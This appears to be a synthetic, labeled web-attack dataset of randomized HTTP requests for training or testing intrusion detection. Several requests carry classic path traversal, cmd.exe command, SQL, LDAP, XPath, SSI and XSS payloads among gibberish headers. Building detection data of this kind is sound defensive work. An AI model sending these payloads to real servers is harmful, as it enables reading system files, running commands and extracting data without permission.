PUT /8WjYBsox6.php3? HTTP/1.1
Content-Length: 32
Content-Language: nhes,cnaef,sieee
Content-Encoding: gzip
Content-Location: http://hciRido.uk/egwp9bs.swf
Content-MD5: bW5sZHBpNmViY2RodGVzbw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 24 Sep 09 23:37:40 UTC
Last-Modified: Wed, 02 Jul 08 13:04:00 UTC
Host: 86.104.145.163
Connection: Ie4b
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 2.231.241.65
Cookie: ielhb2smaem3re6=utJmjseNaw;idscf=aBCWybpX
Cookie2: $Version="7"
Date: Mon, 05 Apr 10 21:15:31 GMT
ETag: W/"reqAMqHfAzn77w6eGvyA"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Sun, 19 Dec 04 08:01:02 CET
If-Unmodified-Since: Sat, 19 Apr 08 19:39:26 UTC
If-Match: "0G3hCafjr.2N4XFsY5c2"
If-None-Match: *
If-Range: Tue, 25 Apr 06 20:47:21 UTC
Max-Forwards: 21
MIME-Version: 1.9
Pragma: 3ttseau='ierl'
Proxy-Authorization: qei4S 0e1e=mede
Authorization: NTLM c2JrMmhlZ0NwdXNoZGJBaE5scnNhaXNudHNldGl5c2QwbQ==
Range: 4-825,07-,961817-416
Referer: http://r6ose.st/enyipa/8sbece7e/raatksut/tplgtlFs/eeca.tar
TE: trailers,deflate,deflate;q=0.5
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.0 (X11; U; Linux i386 0.0; ih-D6; rv:6.3.5) Gecko/98429294
UA-CPU: Sparc
UA-Disp: 088,174,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 789x027
Via: Ebmrhn/7.5 www.oshnenl.css, 1.5 www.tUejt.html
Transfer-Encoding: epWl
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 734 www.Ibioal.css "rqcaasnnairnvta5it" "Mon, 07 Jun 04 08:13:32 UTC"
X-Forwarded-For: 35.190.104.115
X-Serial-Number: 279789
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ghnieejn=s:\winnt\boot.ini

End - Id: 45395
Start - Id: 46318
class: PathTransversal
GET /nor1L/eg/NwdeCynaStowkw9ryne/mUalaneeflohron.jpg?dh8o1aAyol3dsie=euconnecti%40o5%5DLqesl+&Feoht=eotDwtYtjcien&Cecnhahafnwet=kiIp&zhhnft5v8psuh=%2Fetc%2Fpasswd&ass1umpxltate=215775&NiaaedobFlno=inahhoqynstyey HTTP/1.1
Host: 52.179.210.255:1466
Connection: close
Accept: audio/*;q=0.7, application/*;q=0.9
Accept-Charset: iso-8859-3, big5;q=0.8, iso-8859-5
Accept-Encoding: deflate;q=0.7, compress;q=0.0, gzip, identity;q=0.3, compress;q=0.4
Accept-Language: *;q=0.9
Cache-Control: min-fresh=74
Client-ip: 79.110.171.13
Cookie: oriTku=ec sxt hnrkf;TR1sD=d5n5Wlbw;YCOwDv=rqlib;ey8a=5399609
Cookie2: $Version="20"
Date: Thu, 14 Feb 08 04:41:33 GMT
ETag: "-GzYbTKa0ciTQ3FJ"
Expect: 100-continue
From: twei@aedq.de
If-Modified-Since: Fri, 16 Oct 09 18:45:29 CET
If-Unmodified-Since: Thu, 25 Jun 09 18:35:04 UTC
If-Match: "Qwfa1QdWXZiU4g4U@M"
If-None-Match: "mI9f03cd5Sy3g3SZWs"
If-Range: *
Max-Forwards: 2
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest uri=/hecitr/doeame/jelauc/aesajiHl/e5sikade.cfm
Authorization: NTLM NG9wdHUyYUVvcXRlbjJnc2Flc2FkbmVvYTl0aWFlMWNhbmxCcnk=
Range: 595-7160,98-,4-961
Referer: /usnie/bahnor/eioee.dll
TE: deflate,gzip
Trailer: Accept-Language
User-Agent: syoni (2Q-W4xRlnT)
UA-CPU: Sparc
UA-Disp: 0145,4311,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 434x579
Via: HTTP/6.6 www.ogoeyiij.tiff, t7aa/3.1 www.maees.png
Transfer-Encoding: ii3ssr
Upgrade: Dnh/3.3, iienNa/1.0, khpjt/2.7, ote6v4/0.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 189.150.137.247
X-Serial-Number: 4859376671430624
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46318
Start - Id: 48803
class: XPathInjection
GET /LFvU8ZT3Vx/1sam0n.0cGZEf/casEUVrlMFJ4d1L/aXYCWGqE/sgd2socle4Ss.jpeg?qOal=sddar9noow&woeewson=iaHtaNJli&7UcyfJmochaB=%3FelOhhidn&P0r7oaoqarpdp=cqT&hs38tDuc=844&kCpXFK=0yehtk8A&i3gfghu=ebo+&btrrumH=2756352853&I7wdFHVP0@v=%28i+++%3C++++count%28am3%2Fchild%3A%3Atext%28%29%29++++and++++j+++++%3C++count%28cteo%2Fchild%3A%3Acomment%28%29%29++++and++k++%3C++++count%28haw%2Fchild%3A%3A*%29+%29 HTTP/1.0
Host: www.segne.st
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.6, compress;q=0.1, gzip, identity;q=0.3
Accept-Language: te-snnd;q=0.3, avrI-vw1e;q=0.5, hEd-he;q=0.8, mteemo-r5w2iec;q=0.3
Cache-Control: no-store
Client-ip: 15.151.104.240
Cookie: re=tajc4;CzteNietiv3bsen=4771705
Cookie2: $Version="7"
Date: Mon, 07 Aug 06 17:42:32 UTC
ETag: W/".EXNWZ0xRZ8f9BV"
Expect: x2larteo
From: aTnmcfs@so3eotuens.gov
If-Modified-Since: Wed, 31 Mar 10 04:19:28 GMT
If-Unmodified-Since: Mon, 31 Mar 08 03:50:52 GMT
If-Match: "46Wnu8zuFB0Kz6jfl"
If-None-Match: *
If-Range: *
Max-Forwards: 9203
MIME-Version: 5.2
Pragma: lorn1='aeta5a'
Proxy-Authorization: Digest response="08bA7c67a569BFcBED9f6CeCC1e6B5Cb"
Authorization: Digest nonce
Range: -77394
Referer: http://obe5aig.st/m26ebast/ntixsi/Harhi/5weBTd/u5itfnor.gz
TE: trailers,deflate;q=0.5
Trailer: If-Match
User-Agent: Mozilla/0.2 (compatible; Konqueror/9.0; Mac OS X; yietjeh; gtSheetao)
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 807x856
Via: HTTP/2.0 www.am452.js, FTP/4.4 www.arna.css, 0.3 www.snIea7W.png
Transfer-Encoding: compress
Upgrade: o5ls/1.2, tcqti/7.6, demdra/8.9
Warning: 989 42.33.152.171 "ej9c" 
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 9894674694471428
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48803
Start - Id: 44368
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 212.210.232.212
Connection: keep-alive
Accept: image/*;q=0.4, application/x-tar;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 85.70.71.191
Cookie: meilfiiue6grl=291561649;dSgroup byo3hLaccess_logYdl9=492260;BfRVO@.81R=cOdROL;e6hi8QtdupoNdh=en64tRN;tgmnssnaauDust=4;okobe=8saHacEeyhph~bn
Cookie2: $Version="768"
Date: Sun, 30 Mar 08 23:02:32 CET
ETag: W/"X03YS.cWv2WZh-ADngvT"
Expect: p4ymocrd
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Thu, 05 Nov 09 01:53:09 UTC
If-Unmodified-Since: Sun, 23 Mar 08 19:01:14 CET
If-Match: *
If-None-Match: *
If-Range: "usvv7nHn.nQv.BAuoaKB"
Max-Forwards: 2
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM Tkdzb2VtdHRnYnlwY1VuaW41b3NlaG5saW9iYWVsdGloeXk=
Authorization: Digest qop=auth
Range: -126597,56874-704
Referer: /hkc2a/2cacab5.tar
TE: gzip;q=0.8
Trailer: Cache-Control
User-Agent: Mozilla/8.0 (X11; U; Linux i586 4.9; ue-eh; rv:3.2.1) Gecko/38517714
UA-CPU: x86
UA-Disp: 116,364,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 347x4806
Via: FTP/7.3 www.JuteehA.tiff
Transfer-Encoding: gzip
Upgrade: HeiarI/6.4, enio/6.7, DHqogf/0.4
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 94309776768789
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44368
Start - Id: 49452
class: XPathInjection
GET /sfZePJG9/nmedrsl/eoHhl@YI/di0rysxheaili9Hahui/ikvAhDc-5Nhp/osuD5d4gOke3o/e1nRDMrcmLFs32iagz/nGisXHMqcXi.php4?IZirCwefXfA@=r25kBEM87n3&ttznmyitg=sKW8Iienlaiskn&tthrdakl=ftote%3Er&9edieb7Eedeeuio=sueE5rH%27+or++++l%2Fel%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D73%5D++++or+%27et%27++++%3D+%27&te7iper=75997359&ditmodindgu95o=bendq5%3De6%5Ctb&gbgoyje7h2IIsUt=%7CoD978access_lognbe%7Ca+n+m%29wrd HTTP/1.0
Host: www.exncsaoe.fr:80
Connection: igeycfom
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: t6jdadgT-eows4;q=0.9, acuflewy-oehhjtfn;q=0.5, mgat-oIt
Cache-Control: no-store
Client-ip: 243.246.156.115
Cookie: connectRMQdZinputOI6mn=selectafroma =/urestconnectn ruoeval;n.EWG9f=insert l);hbotstohgbesing=t1.8ueswCb@;ouv=iptzC;71g=3504;se8eetnenlisMdn=uesyGhTo
Cookie2: $Version="082"
Date: Thu, 27 Aug 09 05:56:47 CET
ETag: "XqCHjr..mNlZEMbdy2Og"
Expect: 100-continue
From: n5thibdN@srSdAet.st
If-Modified-Since: Sun, 10 Jan 10 12:48:37 GMT
If-Unmodified-Since: Tue, 14 Dec 04 09:59:42 UTC
If-Match: "GcEp3ypmu@-2ZUfMk"
If-None-Match: "Sb@O847m98Y6FOFIJT8"
If-Range: *
Max-Forwards: 078
MIME-Version: 3.2
Pragma: m='Btoaece'
Proxy-Authorization: htefu trde6=iidO
Authorization: NTLM aG9hb3JuNnR4Z2JjYXRhaHd5ZDA4T2hlcnpxVFR0ZXI2aW5F
Range: -756843,-771,-94
Referer: http://seyes.it/aioihooc.php4
TE: deflate,gzip,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.1 (Machintosh; U; PPC Mac OS X 1.1; ev-ad; rv:4.4.9) Gecko/50556122
UA-CPU: Sparc
UA-Disp: 247,139,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 546x4698
Via: 4.6 www.h82kioE.jpg
Transfer-Encoding: gzip
Upgrade: 7V1i5f/9.3
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 125.87.11.223
X-Serial-Number: 812184590933752195
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49452
Start - Id: 39312
class: SSI
GET /yegdrj/TpositionFQxQ7T7admin12/exx4f6JBkxmJQXVB95R/eAEqkE2YT8KDo3xjA.cfm?thodnbje9TInft=liketpositionle%3Cig%7Cga2st5o&iaZbhfttYu4n=yramoz&ewn4h7lriist2q=ts%5C%40tw0acopylg&e8xfeyoid=8779&netcatMQjZuInb=418190669&in5ohwdypeod=rles&6trd=5786403&4eoF=83041&uetTnee=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&neYntGsb=8&uehn1gsienue6rf=+o&0ov1iersIrrbha=%26%3Aln HTTP/1.1
Host: 230.79.79.136
Connection: keep-alive
Accept: video/quicktime;q=0.9, text/xml;q=0.6, audio/basic;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 85.124.56.90
Cookie: oracmfteu7rrfcp=904595;uazgo=9265599;bLgiTna=ha;bRo7torrtlx=vU_
Cookie2: $Version="93"
Date: Mon, 28 May 07 11:49:25 CET
ETag: "1pA1U.J7IAhA3yekD"
Expect: niMp
From: dZei@fOseTvsS7.biz
If-Modified-Since: Sat, 12 Apr 08 05:09:04 CET
If-Unmodified-Since: Thu, 26 Jun 08 24:11:01 GMT
If-Match: *
If-None-Match: "ZVQuLT6wD8sftiDTCJ45"
If-Range: Tue, 12 Jun 07 08:00:33 CET
Max-Forwards: 23
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic YTNzRmljdDpuaWVobHk0cA==
Authorization: Basic QWRpOG1lODphNW1Y
Range: 326-,2201-0740,2-99478
Referer: http://pEn8haef.net/rlo0lrge/dnnasdo/lS6c.msf
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: ioaSugiees8Aateateo
UA-CPU: MIPS
UA-Disp: 593,4970,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5234x268
Via: HTTP/2.9 www.eiaYgktt.css, 6.8 www.tlWno.tiff, 7.9 www.5vsec.png
Transfer-Encoding: identity
Upgrade: bFbb/5.5
Warning: 070 170.64.102.87 "denlnse4nrsv" "Tue, 19 Aug 08 18:04:18 UTC"
X-Forwarded-For: 84.135.253.198
X-Serial-Number: 802337450581
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39312
Start - Id: 36001
class: PathTransversal
POST /ep9e2hl.mspx? HTTP/1.0
Content-Length: 99
Content-Language: noteg,il2b
Content-Encoding: deflate
Content-Location: /na7s.sh
Content-MD5: aXRzaWhleTJ5bGc5NW5ldA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Sep 08 20:06:43 CET
Last-Modified: Sun, 19 Aug 07 13:02:45 GMT
Host: 68.61.194.39
Connection: a2sURig
Accept: */*
Accept-Charset: iso-8859-5;q=0.3, x-mac-cyrillic;q=0.5, windows-1257, iso-8859-2;q=0.5
Accept-Encoding: 
Accept-Language: beeueLul-aehTGiet
Cache-Control: no-store
Client-ip: 241.137.194.133
Cookie: ee3tn9s6smte8=dn8vtRbmtotah;ifnedhhotljgr=tossxilcrefn
Cookie2: $Version="232"
Date: Tue, 09 Nov 04 02:01:19 GMT
ETag: W/"WcuTKJ-E0lIjdULM"
Expect: 100-continue
From: rA7tR@tqia61e.ch
If-Modified-Since: Sun, 05 Dec 04 18:23:33 UTC
If-Unmodified-Since: Mon, 19 Jun 06 20:40:34 GMT
If-Match: "Dz@NEzwdnh2mHynFDBs"
If-None-Match: *
If-Range: Mon, 10 Dec 07 22:40:25 GMT
Max-Forwards: 82
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM YXRlb2F1ZHJFMWhvaWVlbHJzTHRYZWU3MWRkb29nb3Q=
Authorization: NTLM cm9taUFwYzFibDk2c1RlaXMyc2hoNG5yYWhldXN4bmV0ZQ==
Range: -22147
Referer: /d2le/xsHjnlE/urha3g.mp3
TE: chunked,trailers,chunked
Trailer: Accept
User-Agent: Mozilla/6.4 (Machintosh; U; PPC 1.5; es-vi; rv:4.6.1) Gecko/87832416
UA-Disp: 2185,9932,16
UA-OS: Win98
UA-Pixels: 551x993
Via: 1.1 231.169.214.196, 2.7 105.213.1.233, 0.1 www.owoo7t.css
Transfer-Encoding: identity
Upgrade: Aeae/7.7, asLuh/9.6
Warning: 420 www.esiroa.js "tdoieaa" "Wed, 03 Jan 07 09:34:59 GMT"
X-Forwarded-For: 133.228.168.254
~~~~~: ~~~~~~~~~~

crenhnAotttr=..\..\..\..\..\..\..\..\..\WINDOWS\system.ini&1eprehowe7eub=994922

End - Id: 36001
Start - Id: 46807
class: XSS
PUT /trbhle/ciy/pLJaccess_log1duAhetflE/y1ese/o1UE/TunVo/otatfyhaNacdm/eakaraSqrajRen6/hPAs8ARMmRfCQk/a2kg2KI_Kta6dq/B0XwlD.cgi? HTTP/1.1
Content-Length: 191
Content-Language: up0rePJ,rClmwnzm,hiut
Content-Encoding: gzip
Content-Location: /UAketagt/tdfsu/Yeqvtthx.exe
Content-MD5: emVia2U2cml0ZURtdG1laQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 12 Jan 08 24:58:21 UTC
Last-Modified: Wed, 21 Dec 05 20:04:04 GMT
Host: 33.165.245.120
Connection: geOei
Accept: audio/x-wav, image/*, text/plain;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 171.200.231.167
Cookie: samopenls6Kbinzi=vHueqLhT;Raetkice=e-7fGi;it6e=n1s4ubll
Cookie2: $Version="3"
Date: Fri, 30 Jan 04 03:43:11 CET
ETag: W/"t3_n9CfQB2oiozh.E6"
Expect: crttsci=ei2cr
From: wdvoio@iotd9eelwd.de
If-Modified-Since: Wed, 05 Apr 06 20:41:27 GMT
If-Unmodified-Since: Thu, 15 Oct 09 14:28:36 GMT
If-Match: "MEGrXqwucpum@xi9idO5"
If-None-Match: *
If-Range: Mon, 30 Oct 06 24:51:56 UTC
Max-Forwards: 8
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: oand kioW=rs9ay
Authorization: Basic NFZzTnl2Om5vb2Q=
Range: 175390-78,55-,908690-
Referer: /Bntuate/hau8tn7o/tel9on/onooise.asmx
TE: trailers,trailers,trailers
Trailer: Host
User-Agent: Mozilla/0.0 (Machintosh; U; PPC 6.5; Ar-tH; rv:3.1.9) Gecko/63893992
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 818x5674
Via: 2.5 64.74.41.231, FTP/3.7 www.erecoa.htm, coli/5.6 185.118.118.60
Transfer-Encoding: nhPr; u3bs2aRe=daOe
Upgrade: 5dpmt/2.8, kAt/9.2, PrmjAp/1.4, moi/3.4
Warning: 628 www.gpeent.gif "bdfniiksnrsxp" 
X-Forwarded-For: 254.13.104.181
X-Serial-Number: 80684101
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Som0aeeoa=rahtteniyia&goiPKFevw.=dioc3rNo&etiiwWb3o8rAr=)ie&esssagmnew8med9=es24oakowindow.open:o$e+&jah=javascript:alert ("   asrh.k")&OcjB20-77m=zhKr&y7aulfnksOweal=rs:8

End - Id: 46807
Start - Id: 37050
class: LdapInjection
GET /k_Ty7Y08wJI/w5ZCcptA4_6/httpT/mpjP83NjESqWuOhfA@SL/ntDRpehu/rtdRfbekt.mspx?uiay0gti=51&r4r=uav&i3c=td3&qCyAi=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: www.ewagl9ecC.net
Connection: close
Accept: application/rtf, audio/x-wav, text/*;q=0.0
Accept-Charset: windows-1251, isiri-3342;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 197.60.249.140
Cookie: stdLdeoovA=27ySwu;aaldnl=<3eoH<aa8N&
Cookie2: $Version="300"
Date: Tue, 05 Apr 05 06:47:58 UTC
ETag: W/"IEKMqsmRqtDiKn8U3"
Expect: 100-continue
From: ibiyuSf@istTee.cz
If-Modified-Since: Fri, 07 Aug 09 20:36:45 GMT
If-Unmodified-Since: Wed, 20 Feb 08 05:37:29 UTC
If-Match: "tam9Wvcj.NPBOl5OhObA"
If-None-Match: *
If-Range: Fri, 16 Mar 07 15:56:45 UTC
Max-Forwards: 312
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: 5i2re 1lveu=8spaotso
Range: 03242-,-0
Referer: /uadrnfr/lseab/frrsd.conf
TE: deflate;q=0.0,trailers
Trailer: If-Modified-Since
User-Agent: Fhnucl
UA-CPU: 68000
UA-Disp: 922,7603,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 902x8405
Via: 4.1 185.246.47.25, 1.9 www.6cDu0se.jpg
Transfer-Encoding: compress
Upgrade: nopuat/4.5
Warning: 722 60.238.142.91:0 "bhsRneTrnvR4cnsrez" 
X-Forwarded-For: 143.102.250.73
X-Serial-Number: 595061014884085769
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37050
Start - Id: 45917
class: PathTransversal
GET /qjaJ.png?daO5h0T2ta=shtWntyhAe&csi=dqlL&0nb=e%3A%5Cwinnt%5Cboot.ini&qHOi=%7Cmetan+&HQpCsAf=osa+mh%2B5a HTTP/1.0
Host: www.ttrz.uk
Connection: 1lehht
Accept: text/html, text/html;q=0.1, video/quicktime;q=0.0
Accept-Charset: utf-7, koi8-r
Accept-Encoding: identity;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 90.133.156.2
Cookie: HEiso=gkj3;j5PY9x1IC=en=>
Cookie2: $Version="230"
Date: Tue, 16 Mar 04 17:50:50 UTC
ETag: "F9XeIBzlGuOQhpHd7UtM"
Expect: 100-continue
From: leat@aeegln9ow.cz
If-Modified-Since: Mon, 24 Jul 06 14:41:11 CET
If-Unmodified-Since: Sat, 08 Oct 05 07:28:07 UTC
If-Match: "uNs44YLwif8QZFBm"
If-None-Match: "7eDkmWR0e_oJS55"
If-Range: Tue, 22 Dec 09 02:50:22 GMT
Max-Forwards: 584
MIME-Version: 1.5
Pragma: ya=aua
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: soov2n irliL=osbe7e8i
Range: -106180,0973-,3598-
Referer: /rioeo/e4dat/jcnw.mpeg
TE: deflate
Trailer: TE
User-Agent: Mozilla/4.9 (X11; U; Open BSD i386 9.8; Aa-ml; rv:4.0.7) Gecko/26373586
UA-CPU: 68000
UA-Disp: 1794,840,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4595x1071
Via: 8.1 57.233.59.130, FTP/0.7 www.k4ule.htm:93, 0.6 37.12.244.229
Transfer-Encoding: gzip
Upgrade: dhvol/0.8, Pde/4.9
Warning: 095 56.21.175.106:259 "l0gwyrihdtorxlLesCEm" "Thu, 01 Mar 07 09:16:13 CET"
X-Forwarded-For: 210.181.84.191
X-Serial-Number: 715330032292
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45917
Start - Id: 38780
class: LdapInjection
GET /proiwhv3wuOpemn/Om8lgdvnhoh7mpernpia/e0nee6.bin?xpjjBi=dfgh&dnasp=ha3tellnepj&qgrseesem9xltt=a9%29%28+++%7C+++%28tWmTr%3D*%29&B.Hd7T24K=dmvoozrb&nXmDV_Z5FZ=2YOft HTTP/1.0
Host: 205.246.35.243
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Ytuc-4tsote
Cache-Control: Asb=nhd
Client-ip: 103.114.5.31
Cookie: 7-L0-a=nhw;631lRhA7d9M=Dhbmaaf;adywe=tx-AWyeRz@S;q5ldkdvo3bptl93=2412
Cookie2: $Version="919"
Date: Sun, 27 Jan 08 05:15:52 CET
ETag: W/"veWm4Di8HikI9CrFgJ"
Expect: 100-continue
From: eedz@idneeachi.org
If-Modified-Since: Sun, 17 Apr 05 14:46:26 GMT
If-Unmodified-Since: Fri, 26 Mar 04 24:55:50 GMT
If-Match: "xh2hiX1iqH@y@g2y0t"
If-None-Match: "9OTL3T-9Sf6cZW_om"
If-Range: "WumTLqIPh_8WEXcrbd"
Max-Forwards: 06
MIME-Version: 3.1
Pragma: veRgcs='nR'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM OGU0b1J0bWd2YXJlZW9lbmlXdVM0YnVvdXRrdzVzenl5bzNsaXBvOA==
Range: 7-
Referer: /g8ta/0mmee/Nosne1t/3tseaees.tiff
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/8.5 (Windows; U; Win 9x 8.1; Dw-eh; rv:1.5.5) Gecko/08677735
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 601x604
Via: Day/0.5 191.130.216.182
Transfer-Encoding: compress
Upgrade: uheEfl/5.8, bsp/0.2, slh/3.9, tfor/3.1, iAr/7.5
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 251.245.132.75
X-Serial-Number: 323337935267147
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38780
Start - Id: 41679
class: SqlInjection
GET /hJPZ9tfW@jLhtpass/lrisa/titdh862Olya/eAiIiADk1AO26vYM.php3?tmn6wosrtsoez96=iglGi&asbj=l%27eve++vhty+hrmmusrndid&mr=or++0%3C%3E%28select+++++count%28*%29+++++from+++tibt%29&HYHPI=20805407&--EYmezhg323=055569&n6nwmghnno=5601254 HTTP/1.1
Host: 215.28.32.95:4991
Connection: close
Accept: */*
Accept-Charset: cp-950
Accept-Encoding: gzip;q=0.2, deflate, gzip
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 31.225.142.110
Cookie: eihren=8639;0j0Ipyh=1522184;23bnp=t-W;8efertr=i7RckUmE.bD
Cookie2: $Version="83"
Date: Sat, 21 Jan 06 04:50:39 UTC
ETag: "qB-FTULONUY7iO2"
Expect: 100-continue
From: wnytdt@bdcjnzt.org
If-Modified-Since: Tue, 26 Oct 04 17:54:07 GMT
If-Unmodified-Since: Sat, 04 Jun 05 02:57:00 UTC
If-Match: *
If-None-Match: "A9jMPenfjqDAJ@8Pii"
If-Range: *
Max-Forwards: 285
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM bGVkbGpuZW1ucXRsb2JnZWJiZWVmVW0ycGVzbWxpaTRWbVNHeQ==
Authorization: Basic emE4ZXQ6Z2V4YmNz
Range: -91,787-299778
Referer: /ua95o/CeawaRhu.jsp
TE: deflate,trailers,chunked;q=0.6
Trailer: Max-Forwards
User-Agent: et2vKenhtiesd
UA-CPU: x86
UA-Disp: 1862,8220,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 232x3893
Via: lls/5.8 248.254.73.247, 3.2 215.131.160.137
Transfer-Encoding: s53hi; n1uyhetA=ewes6aT
Upgrade: dahek/1.1, htct/7.8, rrepda/5.7, eos/3.6, uoe/1.9
Warning: 118 2.156.64.121 "naglietszhgs" 
X-Forwarded-For: 46.66.131.26
X-Serial-Number: 611965021882313
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41679
Start - Id: 42398
class: SqlInjection
GET /vt/ds/r1F-3oH2Xm7PNR/oossiolleu9w7sugip/rraRCteqzae3aIisa.exe?lteqs3mqeuz1m=%2Bsap6&sbrlttddwOdsu=ooY&gexecrJKBm=ontf&l9Tn8itbrr0r9oI=nxxaeaMetdntfuvegp&o8elO1odurs=27949&enet3=2067&fLqdhnWSntpoMc=vzdee7c7utxterml&eoerrmefoee=Irreautoexec&312=%27+union++++select++sum%28rpnns%29++from+Hh--&iamliyhaa=hrb&uADperl7J1PQN0K=ersdtfcnnaaaot&8uha=nermrtasditQutfn&se6niabixrezmLi=77&tmim8eaqe2i=el+diver%3Ag&PVC6SDfo9p=s%5Ckzmdtsock_streamws1+ine%28x+ HTTP/1.1
Host: www.to1pohnb.be:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: rek3br9-5n6nhlrn, do0-oHi, Bijtd-btdiln, a9asce-h5hTmtt
Cache-Control: no-cache
Client-ip: 44.95.147.247
Cookie: thnemcii=iR ;insertpdANOoservices6S=EcXbgsoundr p ;oakqhoKtqh6tTq=306;nIlsTPcYFf=02821;SwmF@Y4=rmioanawcmtt
Cookie2: $Version="2"
Date: Thu, 09 Aug 07 08:26:48 CET
ETag: "eKuxmXnYHAGMAoO0C"
Expect: aobdyaog
From: aespw@dgaxhlomnn.it
If-Modified-Since: Sun, 28 Jan 07 02:26:27 CET
If-Unmodified-Since: Thu, 18 Dec 08 05:37:15 CET
If-Match: *
If-None-Match: "s8MqG@JQ9iKzuWDb4I2"
If-Range: "zbwJ4xCnoYDO7S_dZbjf"
Max-Forwards: 60
MIME-Version: 2.5
Pragma: OeoQea=izOe2nr
Proxy-Authorization: 0egwt ei2a=faen96m
Authorization: r1dh9i e8eemggy=tumI
Range: -4,92807-997,-01613
Referer: /cnvasvj/iesan9s.tiff
TE: chunked;q=0.7
Trailer: Host
User-Agent: Mozilla/7.3 (compatible; MSIE 1.9; SunOS sun4u; iboSuw6N)
UA-CPU: StrongARM
UA-Disp: 791,8136,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: 0.4 www.wnylltk.htm
Transfer-Encoding: deflate
Upgrade: rse/1.1, o5mn/7.6, zlr3/8.8, or7Eaa/3.4
Warning: 630 www.qHomhe.tiff "xvqr" 
X-Serial-Number: 67876
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42398
Start - Id: 48912
class: XPathInjection
